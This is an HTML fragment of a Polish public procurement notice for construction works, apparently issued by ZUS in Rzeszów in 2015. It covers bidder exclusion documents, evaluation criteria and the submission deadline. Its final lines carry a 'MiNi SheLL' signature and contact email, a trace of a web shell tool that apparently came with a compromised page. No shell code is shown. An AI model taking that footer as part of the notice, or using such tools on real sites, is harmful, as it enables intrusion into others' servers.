<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wykonawcy dołączą do oferty następujące dokumenty: 1. wyceniony przedmiar robót lub kosztorys ofertowy, sporządzony wg wzoru stanowiącego załącznik nr 1 do formularza oferty, 2. projekt harmonogramu rzeczowo-finansowego, sporządzony wg wzoru stanowiącego załącznik nr 6 do części IV SIWZ, 3. pełnomocnictwo - jeżeli dotyczy, 4. specyfikacje techniczne producenta lub inny dokument dla danego materiału lub urządzenia potwierdzające równoważność oferowanych rozwiązań - w przypadku zaoferowania przez Wykonawcę materiałów i urządzeń równoważnych.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - okres gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania w trybie art. 144 ust. 1 ustawy zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy w przypadkach określonych we wzorze umowy stanowiącym część II SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 35-075 Rzeszów ul. Siemiradzkiego 8 pok.2..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.06.2015 godzina 10:00, miejsce: w siedzibie Zamawiającego w Rzeszowie przy Al. Piłsudskiego 12 pok. 26 - Dziennik Podawczy..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com